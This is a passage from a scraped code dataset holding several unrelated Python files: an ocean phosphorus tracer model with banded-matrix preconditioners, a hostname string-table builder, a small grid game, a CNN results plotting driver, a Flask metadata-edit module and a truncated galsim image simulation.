po4)\n dtracer_vals_dt[1, :] = sigma * po4_uptake - dop_remin \\\n + self.depth.mixing_tend(time, dop)\n dtracer_vals_dt[2, :] = (1.0 - sigma) * po4_uptake - pop_remin \\\n + self.depth.mixing_tend(time, pop) + self._sinking_tend(pop)\n\n def _sinking_tend(self, tracer_vals):\n \"\"\"tracer tendency from sinking\"\"\"\n tracer_flux_neg = np.zeros(1+self.depth.axis.nlevs)\n tracer_flux_neg[1:-1] = -tracer_vals[:-1] # assume velocity is 1 m / day\n return np.ediff1d(tracer_flux_neg) * self.depth.axis.delta_r\n\n def _def_hist_dims(self, fptr):\n \"\"\"define netCDF4 dimensions relevant to test_problem\"\"\"\n fptr.createDimension('time', None)\n fptr.createDimension('depth', self.depth.axis.nlevs)\n fptr.createDimension('depth_edges', 1+self.depth.axis.nlevs)\n\n def _def_hist_coord_vars(self, fptr):\n \"\"\"define netCDF4 coordinate vars relevant to test_problem\"\"\"\n fptr.createVariable('time', 'f8', dimensions=('time',))\n fptr.variables['time'].long_name = 'time'\n fptr.variables['time'].units = 'days since 0001-01-01'\n\n fptr.createVariable('depth', 'f8', dimensions=('depth',))\n fptr.variables['depth'].long_name = 'depth'\n fptr.variables['depth'].units = 'm'\n\n fptr.createVariable('depth_edges', 'f8', dimensions=('depth_edges',))\n fptr.variables['depth_edges'].long_name = 'depth_edges'\n fptr.variables['depth_edges'].units = 'm'\n\n def _write_hist_coord_vars(self, fptr, sol):\n \"\"\"write netCDF4 coordinate vars relevant to test_problem\"\"\"\n fptr.variables['time'][:] = sol.t\n fptr.variables['depth'][:] = self.depth.axis.mid\n fptr.variables['depth_edges'][:] = self.depth.axis.edges\n\n def _write_hist(self, sol, hist_fname):\n \"\"\"write tracer values generated in comp_fcn to hist_fname\"\"\"\n with Dataset(hist_fname, mode='w') as fptr:\n self._def_hist_dims(fptr)\n self._def_hist_coord_vars(fptr)\n\n for tracer_name in self._tracer_names:\n fptr.createVariable(tracer_name, 'f8', dimensions=('time', 'depth'))\n\n fptr.createVariable('mixing_coeff', 'f8', dimensions=('time', 'depth_edges'))\n fptr.variables['mixing_coeff'].long_name = 'vertical mixing coefficient'\n fptr.variables['mixing_coeff'].units = 'm2 s-1'\n\n self._write_hist_coord_vars(fptr, sol)\n\n tracer_vals = sol.y.reshape(\n (len(self._tracer_names), self.depth.axis.nlevs, -1))\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n fptr.variables[tracer_name][:] = tracer_vals[tracer_ind, :, :].transpose()\n\n for time_ind, time in enumerate(sol.t):\n fptr.variables['mixing_coeff'][time_ind, :] = \\\n (1.0 / 86400.0) * self.depth.mixing_coeff(time)\n\n def apply_precond_jacobian(self, ms_in, precond_fname, res_fname, solver_state):\n \"\"\"apply preconditioner of jacobian of comp_fcn to model state object, ms_in\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('precond_fname=\"%s\", res_fname=\"%s\"', precond_fname, res_fname)\n\n fcn_complete_step = 'apply_precond_jacobian complete for %s' % res_fname\n if solver_state.step_logged(fcn_complete_step):\n logger.debug('\"%s\" logged, returning result', fcn_complete_step)\n return ModelState(res_fname)\n logger.debug('\"%s\" not logged, proceeding', fcn_complete_step)\n\n ms_res = ms_in.copy()\n\n with Dataset(precond_fname, 'r') as fptr:\n # hist and precond files have mixing_coeff in m2 s-1\n # convert back to model units of m2 d-1\n mca = 86400.0 * fptr.variables['mixing_coeff_log_avg'][:]\n\n for tracer_module_name in ms_in.tracer_module_names:\n if tracer_module_name == 'iage_test':\n self._apply_precond_jacobian_iage_test(ms_in, mca, ms_res)\n if tracer_module_name == 'phosphorus':\n self._apply_precond_jacobian_phosphorus(ms_in, mca, ms_res)\n\n solver_state.log_step(fcn_complete_step)\n\n return ms_res.dump(res_fname)\n\n def _apply_precond_jacobian_iage_test(self, ms_in, mca, ms_res):\n \"\"\"apply preconditioner of jacobian of iage_test fcn\"\"\"\n\n iage_test_in = ms_in.get_tracer_vals('iage_test')\n rhs = (1.0 / (self.time_range[1] - self.time_range[0])) * iage_test_in\n\n l_and_u = (1, 1)\n matrix_diagonals = np.zeros((3, self.depth.axis.nlevs))\n matrix_diagonals[0, 1:] = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n matrix_diagonals[1, :-1] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n matrix_diagonals[1, 1:] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n matrix_diagonals[2, :-1] = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n matrix_diagonals[1, 0] = -24.0\n matrix_diagonals[0, 1] = 0\n\n res = solve_banded(l_and_u, matrix_diagonals, rhs)\n\n ms_res.set_tracer_vals('iage_test', res - iage_test_in)\n\n def _apply_precond_jacobian_phosphorus(self, ms_in, mca, ms_res):\n \"\"\"\n apply preconditioner of jacobian of phosphorus fcn\n it is only applied to shadow phosphorus tracers\n \"\"\"\n\n po4_s = ms_in.get_tracer_vals('po4_s')\n dop_s = ms_in.get_tracer_vals('dop_s')\n pop_s = ms_in.get_tracer_vals('pop_s')\n rhs = (1.0 / (self.time_range[1] - self.time_range[0])) \\\n * np.concatenate((po4_s, dop_s, pop_s))\n\n nz = self.depth.axis.nlevs # pylint: disable=C0103\n\n matrix = diags(\n [self._diag_0_phosphorus(mca), self._diag_p_1_phosphorus(mca),\n self._diag_m_1_phosphorus(mca), self._diag_p_nz_phosphorus(),\n self._diag_m_nz_phosphorus(), self._diag_p_2nz_phosphorus(),\n self._diag_m_2nz_phosphorus()],\n [0, 1, -1, nz, -nz, 2*nz, -2*nz], format='csr')\n\n res = spsolve(matrix, rhs)\n\n _, sing_vals, r_sing_vects = svd(matrix.todense())\n min_ind = sing_vals.argmin()\n res -= (res.mean()/r_sing_vects[min_ind, :].mean()) * r_sing_vects[min_ind, :]\n\n ms_res.set_tracer_vals('po4_s', res[0:nz] - po4_s)\n ms_res.set_tracer_vals('dop_s', res[nz:2*nz] - dop_s)\n ms_res.set_tracer_vals('pop_s', res[2*nz:3*nz] - pop_s)\n\n def _diag_0_phosphorus(self, mca):\n \"\"\"return main diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_0_single_tracer = np.zeros(self.depth.axis.nlevs)\n diag_0_single_tracer[:-1] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n diag_0_single_tracer[1:] -= mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n diag_0_po4_s = diag_0_single_tracer.copy()\n diag_0_po4_s[0] -= 1.0 # po4_s restoring in top layer\n diag_0_dop_s = diag_0_single_tracer.copy()\n diag_0_dop_s -= 0.01 # dop_s remin\n diag_0_pop_s = diag_0_single_tracer.copy()\n diag_0_pop_s -= 0.01 # pop_s remin\n # pop_s sinking loss to layer below\n diag_0_pop_s[:-1] -= 1.0 * self.depth.axis.delta_r[:-1]\n return np.concatenate((diag_0_po4_s, diag_0_dop_s, diag_0_pop_s))\n\n def _diag_p_1_phosphorus(self, mca):\n \"\"\"return +1 upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_single_tracer = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[:-1]\n diag_p_1_po4_s = diag_p_1_single_tracer.copy()\n zero = np.zeros(1)\n diag_p_1_dop_s = diag_p_1_single_tracer.copy()\n diag_p_1_pop_s = diag_p_1_single_tracer.copy()\n return np.concatenate(\n (diag_p_1_po4_s, zero, diag_p_1_dop_s, zero, diag_p_1_pop_s))\n\n def _diag_m_1_phosphorus(self, mca):\n \"\"\"return +1 upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_m_1_single_tracer = mca[1:-1] * self.depth.axis.delta_mid_r \\\n * self.depth.axis.delta_r[1:]\n diag_m_1_po4_s = diag_m_1_single_tracer.copy()\n zero = np.zeros(1)\n diag_m_1_dop_s = diag_m_1_single_tracer.copy()\n diag_m_1_pop_s = diag_m_1_single_tracer.copy()\n # pop_s sinking gain from layer above\n diag_m_1_pop_s += 1.0 * self.depth.axis.delta_r[1:]\n return np.concatenate(\n (diag_m_1_po4_s, zero, diag_m_1_dop_s, zero, diag_m_1_pop_s))\n\n def _diag_p_nz_phosphorus(self):\n \"\"\"return +nz upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_dop_po4 = 0.01 * np.ones(self.depth.axis.nlevs) # dop_s remin\n diag_p_1_pop_dop = np.zeros(self.depth.axis.nlevs)\n return np.concatenate((diag_p_1_dop_po4, diag_p_1_pop_dop))\n\n def _diag_m_nz_phosphorus(self):\n \"\"\"return -nz lower diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_po4_dop = np.zeros(self.depth.axis.nlevs)\n diag_p_1_po4_dop[0] = 0.67 # po4_s restoring conservation balance\n diag_p_1_dop_pop = np.zeros(self.depth.axis.nlevs)\n return np.concatenate((diag_p_1_po4_dop, diag_p_1_dop_pop))\n\n def _diag_p_2nz_phosphorus(self):\n \"\"\"return +2nz upper diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n return 0.01 * np.ones(self.depth.axis.nlevs) # pop_s remin\n\n def _diag_m_2nz_phosphorus(self):\n \"\"\"return -2nz lower diagonal of preconditioner of jacobian of phosphorus fcn\"\"\"\n diag_p_1_po4_pop = np.zeros(self.depth.axis.nlevs)\n diag_p_1_po4_pop[0] = 0.33 # po4_s restoring conservation balance\n return diag_p_1_po4_pop\n\nclass SpatialAxis():\n \"\"\"class for spatial axis related quantities\"\"\"\n def __init__(self, fname, edges_varname):\n with Dataset(fname) as fptr:\n fptr.set_auto_mask(False)\n self.edges = fptr.variables[edges_varname][:]\n self.mid = 0.5 * (self.edges[:-1] + self.edges[1:])\n self.delta = np.ediff1d(self.edges)\n self.delta_r = 1.0 / self.delta\n self.delta_mid_r = 1.0 / np.ediff1d(self.mid)\n self.nlevs = len(self.mid)\n\nclass Depth():\n \"\"\"class for depth axis vals and methods\"\"\"\n def __init__(self, depth_fname):\n self.axis = SpatialAxis(depth_fname, 'depth_edges')\n\n self._time_val = None\n self._mixing_coeff_vals = np.empty(self.axis.nlevs)\n\n def mixing_tend(self, time, tracer_vals):\n \"\"\"tracer tendency from mixing\"\"\"\n tracer_grad = np.zeros(1+self.axis.nlevs)\n tracer_grad[1:-1] = np.ediff1d(tracer_vals) * self.axis.delta_mid_r\n tracer_flux_neg = self.mixing_coeff(time) * tracer_grad\n return np.ediff1d(tracer_flux_neg) * self.axis.delta_r\n\n def mixing_coeff(self, time):\n \"\"\"\n vertical mixing coefficient, m2 d-1\n store computed vals, so their computation can be skipped on subsequent calls\n \"\"\"\n\n # if vals have already been computed for this time, skip computation\n if time == self._time_val:\n return self._mixing_coeff_vals\n\n bldepth_min = 50.0\n bldepth_max = 150.0\n bldepth_del = bldepth_max - bldepth_min\n bldepth = bldepth_min \\\n + bldepth_del * (0.5 + 0.5 * np.cos((2 * np.pi) * ((time / 365.0) - 0.25)))\n # z_lin ranges from 0.0 to 1.0 over span of 50.0 m, is 0.5 at bldepth\n z_lin = 0.5 + (self.axis.edges - bldepth) * (1.0 / 50.0)\n z_lin = np.maximum(0.0, np.minimum(1.0, z_lin))\n res_log10_shallow = 0.0\n res_log10_deep = -5.0\n res_log10_del = res_log10_deep - res_log10_shallow\n res_log10 = res_log10_shallow + res_log10_del * z_lin\n self._time_val = time\n self._mixing_coeff_vals = 86400.0 * 10.0 ** res_log10\n return self._mixing_coeff_vals\n\n################################################################################\n\nif __name__ == '__main__':\n main(_parse_args())\n","sub_path":"newton_fcn_test_problem.py","file_name":"newton_fcn_test_problem.py","file_ext":"py","file_size_in_byte":24445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612049894","text":"#!/usr/bin/python2.4\n#\n# Copyright 2011 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Builds the string table. See class comment for more details.\"\"\"\n\n__author__ = 'bmcquade@google.com (Bryan McQuade)'\n\nclass StringTableBuilder(object):\n \"\"\"Builds a string table of hostname parts from the given suffix trie.\n\n StringTableBuilder constructs the string table and provides an API\n to find the index of a hostname-part within the string table.\n\n The string table is an array of null-separated unique string\n suffixes, combined with a map that allows for efficient lookup of\n the offset of a string suffix within the array.\n \"\"\"\n def __init__(self):\n # The generated string table containing one character per element,\n # e.g. for \"com\\0edu\\0au\\0 the table would contain: ['c', 'o',\n # 'm', '\\0', 'e', 'd', 'u', '\\0', 'a', 'u', '\\0'].\n self._string_table = []\n\n # Map from a hostname-part (e.g. 'com' or 'edu') to its offset in\n # the string table.\n self._hostname_part_map = {}\n\n def BuildStringTable(self, hostname_part_node, root_suffix_node):\n \"\"\"Constructs the string table using the specified tries.\n\n Args:\n hostname_part_node: TrieNode for the hostname part being added to\n the string table.\n root_suffix_node: Root TrieNode containing all unique hostname part\n string suffixes.\n \"\"\"\n children = hostname_part_node.GetChildren()\n\n # Iterate over all of the children in the hostname part node, and\n # add each to the string table.\n for child in children:\n node = root_suffix_node\n # NOTE: iterating characters in reverse order assumes that there\n # are no multibyte characters in the stream.\n for char in reversed(child.GetName()):\n if ord(char) > 127:\n raise ValueError(\"Encountered unexpected multibyte character.\")\n\n # Get the node associated with the character. Since\n # root_suffix_node was already populated with all of the\n # hostname-parts, this should always succeed. If there is no\n # child node for the given character, it's an error, and\n # GetChild will raise a ValueError.\n node = node.GetChild(char)\n self._EmitHostnamePart(node)\n\n # Now recursively add all of the children of the\n # hostname_part_node to the string table.\n for child in children:\n self.BuildStringTable(child, root_suffix_node)\n\n def GetStringTable(self):\n \"\"\"Return the generated string table.\"\"\"\n return self._string_table\n\n def GetHostnamePartOffset(self, name):\n \"\"\"Get the offset of the given hostname-part in the string table.\"\"\"\n return self._hostname_part_map[name]\n\n def _EmitHostnamePart(self, node):\n \"\"\"Emit the hostname-part for the node to the string table.\n\n Args:\n node: The string suffix node to emit. Each node in the chain\n contains a single character to be emitted.\n \"\"\"\n\n # Find the most shallow leaf under this node and emit it\n # instead. By emitting only leaves, we compress hostname-parts\n # that are themselves suffixes of other hostname-parts. For\n # instance, we do not emit 'missoula' because it is a suffix of\n # another hostname-part 'fortmissoula'. We can instead emit\n # 'fortmissoula' and refer to 'missoula' as the offset of\n # 'fortmissoula' plus 4 characters. This reduces the size of the\n # string table by ~1kB.\n node = StringTableBuilder._FindMostShallowLeafNode(node)\n\n hostname_part = node.GetIdentifier()\n if hostname_part in self._hostname_part_map:\n # This hostname part has already been emitted during a previous\n # invocation, so there is nothing more to do.\n return\n\n # Store the offset of the hostname part we're about to emit.\n self._hostname_part_map[hostname_part] = len(self._string_table)\n\n # Append the characters for this hostname_part to the string table\n # as well as a trailing null byte.\n self._string_table.extend(hostname_part)\n self._string_table.append('\\0')\n\n # Next, walk up the parent chain, looking for additional terminal\n # nodes. For each terminal node, create an entry in the\n # hostname_parts map. Since each parent that is a terminal node is\n # a suffix of the hostname_part we just added (e.g. if we just\n # added 'hello' then our parent is 'ello', the next parent is\n # 'llo', etc), the index in the hostname_part map should point\n # into the string we just added to the string table. For instance\n # if we just added 'hello' at index 500 and 'llo' is a terminal\n # node, we should add an entry for 'llo' at index 502.\n\n # Remember the index of the hostname_part just added, as well as\n # its length, so we can add parent terminal nodes relative to it.\n leaf_hostname_part_index = self._hostname_part_map[hostname_part]\n leaf_hostname_part_len = len(hostname_part)\n\n parent = node.GetParent()\n while True:\n if parent.IsTerminalNode():\n hostname_part = parent.GetIdentifier()\n if hostname_part not in self._hostname_part_map:\n offset = leaf_hostname_part_len - len(hostname_part)\n self._hostname_part_map[hostname_part] = (\n leaf_hostname_part_index + offset)\n if parent.IsRoot():\n break\n parent = parent.GetParent()\n\n @staticmethod\n def _FindMostShallowLeafNode(node):\n \"\"\"Return the most shallow leaf TrieNode under the the given node.\n\n Returns the given node if that node is a leaf node.\n\n Args:\n node: The TrieNode to begin searching from.\n \"\"\"\n # Suppress warning \"Object (best) has no attribute (GetParentChain)\"\n __pychecker__ = 'no-objattrs'\n\n if not node.HasChildren():\n return node\n\n candidates = (StringTableBuilder._FindMostShallowLeafNode(child)\n for child in node.GetChildren())\n\n # Return the candidate node with the smallest chain length.\n # oschaaf(XXX):\n # We sort on x.GetIdentifier() too to avoid inconsistent results between\n # 32 bits and 64 bits systems running this script in case multiple\n # candidates have the same (minimum) chain length.\n # Though not sorting on x.GetIdentifier() doesn't seem to affect validity\n # the consistency is helpful in that it will avoid future debugging \n # sessions.\n s = sorted(candidates,\n key = lambda x: (len(x.GetParentChain()), x.GetIdentifier()))\n return s[0]\n","sub_path":"third_party/domain_registry_provider/src/registry_tables_generator/string_table_builder.py","file_name":"string_table_builder.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585591052","text":"from Tile_Player import Player\nfrom Tile_Player import Tile\nfrom Tile_Player import Target\nfrom usingEnums import Direction\nfrom usingEnums import Element\nimport sys\n\nclass Field(object):\n\n def __init__(self, heigth, width):\n self.heigth = heigth\n self.width = width\n self.counter = 0\n self.list = [[0 for x in range(self.width + 1)] for y in range(self.heigth+ 1)]\n for y in range(0, self.heigth +1):\n for x in range(0, self.width+1):\n if(x is 0 or x is self.width or y is 0 or y is self.heigth):\n self.list[x][y] = (Tile(Element.Wall))\n else:\n self.list[x][y] = (Tile(Element.Free))\n\n def addPlayer(self, x, y):\n if(self.list[x][y].element is Element.Free):\n self.list[x][y] = self.player = Player(x, y)\n\n def addTarget(self, x, y):\n if(self.list[x][y].element is Element.Free):\n self.list[x][y] = self.target = Target(x, y)\n\n\n def Draw(self):\n for y in range(0, self.heigth +1):\n for x in range(0, self.width+1):\n if(x is 0 or x is self.width or y is 0 or y is self.heigth):\n if(x is self.width):\n print(self.list[x][y].element.value, end=\"\\n\")\n else:\n print(self.list[x][y].element.value, end=\"\")\n else:\n print(self.list[x][y].element.value, end=\"\")\n\n def MovePlayer(self, direction, objectToMove):\n output = \"\"\n if(objectToMove.__class__ is Player):\n x = self.player.x\n y = self.player.y\n if(Direction.left.value in direction):\n x = x - 1\n if(Direction.up.value in direction):\n y = y -1\n if(Direction.right.value in direction):\n x = x + 1\n if(Direction.down.value in direction):\n y = y + 1\n\n if(objectToMove.__class__ is Player):\n if(self.list[x][y].element is Element.Free or self.list[x][y].element is Element.Target):\n self.list[self.player.x][self.player.y] = Tile(Element.Free)\n self.list[x][y] = Player(x, y)\n prevxplayer = self.player.x\n prevyplayer = self.player.y\n self.player.x = x\n self.player.y = y\n\n\n if(self.target.x is self.player.x and self.target.y is self.player.y):\n self.list[prevxplayer][prevyplayer] = Target(prevxplayer, prevyplayer)\n self.target.x = prevxplayer\n self.target.y = prevyplayer\n self.counter += 1\n if(self.counter > 6):\n output = (\"Really??\")\n else:\n if(self.counter > 4):\n output = (\"Are you Even Trying?\")\n else:\n if(self.counter > 2):\n output = (\"Is it Really that hard?\")\n\n return (output)\n","sub_path":"Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"618274467","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 26 21:23:46 2019\n\n@author: hwan\n\"\"\"\n\nfrom Utilities.plot_and_save_figures_layerwise import plot_and_save_figures\nfrom decimal import Decimal # for filenames\nimport os\nimport sys\n\nimport pdb #Equivalent of keyboard in MATLAB, just add \"pdb.set_trace()\"\n\n###############################################################################\n# HyperParameters and RunOptions #\n###############################################################################\nclass Hyperparameters:\n max_hidden_layers = 3 # For this architecture, need at least 2. One for the mapping to the feature space, one as a trainable hidden layer. EXCLUDES MAPPING BACK TO DATA SPACE\n filter_size = 3\n num_filters = 12\n activation = 'elu'\n regularization = 0.001\n node_TOL = 1e-4\n error_TOL = 1e-4\n batch_size = 1000\n num_epochs = 3\n\nclass RunOptions:\n def __init__(self): \n #=== Use L_1 Regularization ===#\n self.use_L1 = 1\n self.use_L2 = 0\n \n #=== Choose Data Set ===#\n self.data_MNIST = 1\n self.data_CIFAR10 = 0 \n self.data_CIFAR100 = 0\n \n #=== Random Seed ===#\n self.random_seed = 1234\n \n###############################################################################\n# File Paths #\n###############################################################################\nclass FilePaths(): \n def __init__(self, hyperp, run_options): \n #=== Declaring File Name Components ===# \n self.NN_type = 'CNN'\n if run_options.data_MNIST == 1:\n self.dataset = 'MNIST'\n if run_options.data_CIFAR10 == 1:\n self.dataset = 'CIFAR10'\n if run_options.data_CIFAR100 == 1:\n self.dataset = 'CIFAR100' \n if run_options.use_L1 == 1:\n reg_string = '_L1'\n if run_options.use_L2 == 1:\n reg_string = '_L2' \n if hyperp.regularization >= 1:\n regularization_string = str(hyperp.regularization)\n else:\n regularization_string = str(hyperp.regularization)\n regularization_string = 'pt' + regularization_string[2:] \n node_TOL_string = str('%.2e' %Decimal(hyperp.node_TOL))\n node_TOL_string = node_TOL_string[-1]\n error_TOL_string = str('%.2e' %Decimal(hyperp.error_TOL))\n error_TOL_string = error_TOL_string[-1]\n \n #=== File Name ===#\n if run_options.use_L1 == 0 and run_options.use_L2 == 0:\n self.filename = self.dataset + '_' + self.NN_type + '_mhl%d_fs%d_nf%d_eTOL%s_b%d_e%d' %(hyperp.max_hidden_layers, hyperp.filter_size, hyperp.num_filters, error_TOL_string, hyperp.batch_size, hyperp.num_epochs)\n else:\n self.filename = self.dataset + '_' + self.NN_type + reg_string + '_mhl%d_fs%d_nf%d_r%s_nTOL%s_eTOL%s_b%d_e%d' %(hyperp.max_hidden_layers, hyperp.filter_size, hyperp.num_filters, regularization_string, node_TOL_string, error_TOL_string, hyperp.batch_size, hyperp.num_epochs)\n\n #=== Saving neural network ===#\n self.NN_savefile_directory = '../Trained_NNs/' + self.filename # Since we save the parameters for each layer separately, we need to create a new folder for each model\n self.NN_savefile_name = self.NN_savefile_directory + '/' + self.filename # The file path and name for the saved parameters\n\n #=== Saving Figures ===#\n self.figures_savefile_directory = '../Figures/' + self.filename\n\n #=== Creating Directories ===#\n if not os.path.exists(self.figures_savefile_directory):\n os.makedirs(self.figures_savefile_directory)\n \n###############################################################################\n# Driver #\n###############################################################################\nif __name__ == \"__main__\": \n\n #=== Hyperparameters and Run Options ===# \n hyperp = Hyperparameters()\n run_options = RunOptions()\n \n if len(sys.argv) > 1:\n hyperp.max_hidden_layers = int(sys.argv[1])\n hyperp.filter_size = int(sys.argv[2])\n hyperp.num_filters = int(sys.argv[3])\n hyperp.activation = str(sys.argv[4])\n hyperp.regularization = float(sys.argv[5])\n hyperp.reg_schedule = float(sys.argv[6])\n hyperp.node_TOL = float(sys.argv[7])\n hyperp.error_TOL = float(sys.argv[8])\n hyperp.batch_size = int(sys.argv[9])\n hyperp.num_epochs = int(sys.argv[10])\n \n #=== File Names ===#\n file_paths = FilePaths(hyperp, run_options)\n \n #=== Plot and save figures ===#\n plot_and_save_figures(hyperp, run_options, file_paths)\n","sub_path":"Codes_TF2/Plotting_Results_CNNLayerwise.py","file_name":"Plotting_Results_CNNLayerwise.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243152031","text":"from flask import Flask, request \nfrom flask import redirect, url_for\nfrom utils import mysqldb \nfrom flask import session\n\ndef rander_one_apply(apy):\n\trow= {'opt':[]}\n\n\tapply_type = apy.apply_type\n\tif apply_type == 'host_create' or apply_type == 'host_change':\n\t\thost_id = apy.entity_id\n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']='N/A'\n\t\trow['TABLE']='N/A'\n\tif apply_type == 'db_create' or apply_type == 'db_change':\n\t\tdb_id = apy.entity_id\n\t\tdata_base = mysqldb.DataBase.query.filter_by(id=db_id).first()\n\t\thost_id = data_base.host_id \n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']=data_base.name\n\t\trow['TABLE']='N/A'\n\tif apply_type == 'table_create' or apply_type == 'table_change':\n\t\ttable_id = apy.entity_id\n\t\tdata_table = mysqldb.DataTable.query.filter_by(id=table_id).first()\n\t\tdb_id = data_table.db_id \n\t\tdata_base = mysqldb.DataBase.query.filter_by(id=db_id).first()\n\t\thost_id = data_base.host_id\n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']=data_base.name\n\t\trow['TABLE']=data_table.name\n\n\trow['ID']=apy.id\n\trow['TYPE']=apy.apply_type\n\trow['TIME_EDIT']=apy.update_time\n\trow['STATUS']=apy.apply_status\n\trow['REVIEWER']=apy.reviewer\n\trow['opt'].append({ \n\t\t'url':url_for('edits', apply_id=apy.id), \n\t\t'icon':'icon-pencil' \n\t})\t\n\treturn row\n\n\ndef list_applies(request):\n\tmodel = {}\n\tapplyer_id = session['userinfo']['id']\n\tapplyer = session['userinfo']['name']\n\n\tapplies = mysqldb.DataApply.query.filter_by(applyer_id=applyer_id).order_by(mysqldb.DataApply.update_time.desc())\n\tmodel['table']=[]\n\tfor apy in applies:\n\t\trow = rander_one_apply(apy)\n\t\tmodel['table'].append(row)\n\treturn model\n\ndef service(request):\n\tmodel={}\n\tmodel=list_applies(request)\n\treturn model\n\ndef edit_detail_parse(request):\n\tapply_id = request.args.get('apply_id')\n\tapy = mysqldb.DataApply.query.filter_by(id=apply_id).first()\n\tapply_type = apy.apply_type\n\tif apply_type == 'host_create' or apply_type == 'host_change':\n\t\treturn url_for('edit_host', apply_id=apply_id)\n\tif apply_type == 'db_create' or apply_type == 'db_change':\n\t\treturn url_for('edit_db', apply_id=apply_id)\n\tif apply_type == 'table_create' or apply_type == 'table_change':\n\t\treturn url_for('edit_table', apply_id=apply_id)\n","sub_path":"meta_data/modules/mod_edits.py","file_name":"mod_edits.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518355213","text":"from astropy.io import fits\nfrom ngmix.medsreaders import NGMixMEDS\nimport numpy as np\nimport galsim\nimport fitsio\n\n#Functions\ndef flux_to_mag(F):\n return -2.5*np.log10(F)+30.0\n\ndef mag_to_flux(m):\n return 10**(-0.4*(m-30))\n\ndef make_sim_one_cutout(*, seed, g1, g2, open_meds, obj_ind, cutout):\n m = open_meds\n rng = np.random.RandomState(seed=seed)\n gal = galsim.Exponential(half_light_radius=0.5).shear(g1=g1, g2=g2) #let's do sheared exponentials again\n\n #fwhm=rng.uniform(low=0.8,high=1.5) #will use a random FWHM for each sim just because\n # fwhm=np.random.uniform(low=0.8,high=1.0)\n psf = galsim.Gaussian(fwhm=0.9)\n obj = galsim.Convolve([gal, psf])\n\n dim = m[1]['box_size'][obj_ind] #size of the image box\n\n cutout_row = m[1]['cutout_row'][obj_ind][cutout]\n cutout_col = m[1]['cutout_col'][obj_ind][cutout]\n #dither = np.random.uniform(size=2, low=-0.5, high=0.5)\n #scale = 0.263 #the size of a DECam pixel in arcsec on the sky\n\n #get WCS:\n #jacobian: column in MEDS is x, row is y\n dudx = m[1]['dudcol'][obj_ind][cutout]\n dudy = m[1]['dudrow'][obj_ind][cutout]\n dvdx = m[1]['dvdcol'][obj_ind][cutout]\n dvdy = m[1]['dvdrow'][obj_ind][cutout]\n wcs = galsim.JacobianWCS(dudx, dudy, dvdx, dvdy)\n\n #from matt: drawImage(nx=stampsize, ny=stampsize, wcs=jac_wcs, center=galsim.PositionD(x=cutout_col, y=cutout_row))\n #flux = m[1].data['flux'][obj_ind]\n im = obj.drawImage(nx=dim, ny=dim, wcs=wcs,\n center=galsim.PositionD(x=cutout_col, y=cutout_row)).array * mag_to_flux(18.0) #multiplying by flux here, is that what I really want?\n\n im_start_row = m[1]['start_row'][obj_ind][cutout]\n im_end_row = im_start_row + dim**2\n weight=m[5][im_start_row:im_end_row].reshape(dim,dim) #get the weight of each cutout, will use this to add noise to the simulated image\n with np.errstate(divide='ignore', invalid = 'ignore'):\n nse=np.sqrt(1.0/weight)\n im += rng.normal(size=im.shape, scale=nse)\n # im += np.random.normal(size=im.shape, scale=nse)\n im[weight==0.0]=0.0 #setting the flux to zero where the weight is zero\n\n bmask_im = m['bmask_cutouts'][im_start_row:im_end_row]\n bmask_im[bmask_im!=2**30] = 0 #setting bmask to zero everywhere it is not 2^30\n\n\n psf_row = m[1]['psf_row_size'][obj_ind][cutout] #size of the PSF (rows) for each cutout\n psf_col = m[1]['psf_col_size'][obj_ind][cutout] #size of the PSF (cols) for each cutout\n assert psf_row==psf_col, \"PSF is not a square, which they say is not cool\"\n\n psf_start_row = m[1]['psf_start_row'][obj_ind][cutout]\n psf_end_row = psf_start_row + psf_row*psf_col\n psf_center_y = m[1]['psf_cutout_row'][obj_ind][cutout]+1\n psf_center_x = m[1]['psf_cutout_col'][obj_ind][cutout]+1\n psf_im = psf.drawImage(nx=psf_row, ny=psf_col, wcs=wcs,\n 